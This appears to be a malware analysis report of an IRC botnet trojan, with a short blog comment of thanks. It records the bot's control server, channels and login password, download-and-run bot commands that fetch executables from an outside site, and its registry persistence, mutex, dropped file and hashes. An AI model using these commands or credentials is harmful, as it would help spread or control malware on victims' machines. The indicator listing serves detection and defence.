Remote Host Port Number
irc.nurcan.net 8067
89.107.228.69:8067
#. 4 [+mu]
#.. 273 [+mu]
#opers 2 [+mu]
#msn 617 [+mMu]
#syn 290 [+mMu]
#baba 126 [+mu]
.r.getfile http://www.pcdebenyokken.net/porno2.exe C:/windowUpdate.exe 1
.indir www.pcdebenyokken.net/porno.exe 1
.login baban
.indir
bots at #baba login = ( .login baban )
at #msn = ( .l injecter )
.r.getfile http://www.pcdebenyokken.net/porno2.exe C:/windowUpdate.exe 1
NICK [00|USA|807464]
USER XP-7218 * 0 :COMPUTERNAME
Other details
* To mark the presence in the system, the following Mutex object was created:
o Gangsta
* The following ports were open in the system:
Port Protocol Process
1033 TCP winudpmgr.EXE (%Windir%winudpmgr.EXE)
1034 TCP winudpmgr.EXE (%Windir%winudpmgr.EXE)
* The following Host Name was requested from a host database:
o irc.nurcan.net
Registry Modifications
* The newly created Registry Value is:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Windows UDP Control Center = “winudpmgr.exe”
so that winudpmgr.exe runs every time Windows starts
Memory Modifications
* There were new processes created in the system:
Process Name Process Filename Main Module Size
winudpmgr.exe %Windir%winudpmgr.exe 315 392 bytes
[filename of the sample #1] [file and pathname of the sample #1] 69 632 bytes
File System Modifications
* The following file was created in the system:
# Filename(s) File Size File Hash Alias
1 [file and pathname of the sample #1]
%Windir%winudpmgr.exe 90 644 bytes MD5: 0x3A97DAAA59E1AA0B0D387A2C8B26C165
SHA-1: 0x45BB30ED6BB464634E43E94485E72446276E91F1 Trojan.Win32.Midgare.apkk [Kaspersky Lab]
Generic.dx!tgh [McAfee]
Trojan:Win32/Ircbrute [Microsoft]
Trojan.Win32.Ircbrute [Ikarus]
建邱勳 - August 6, 2010 at 2:06 pm
感謝分享 功德無量............................................................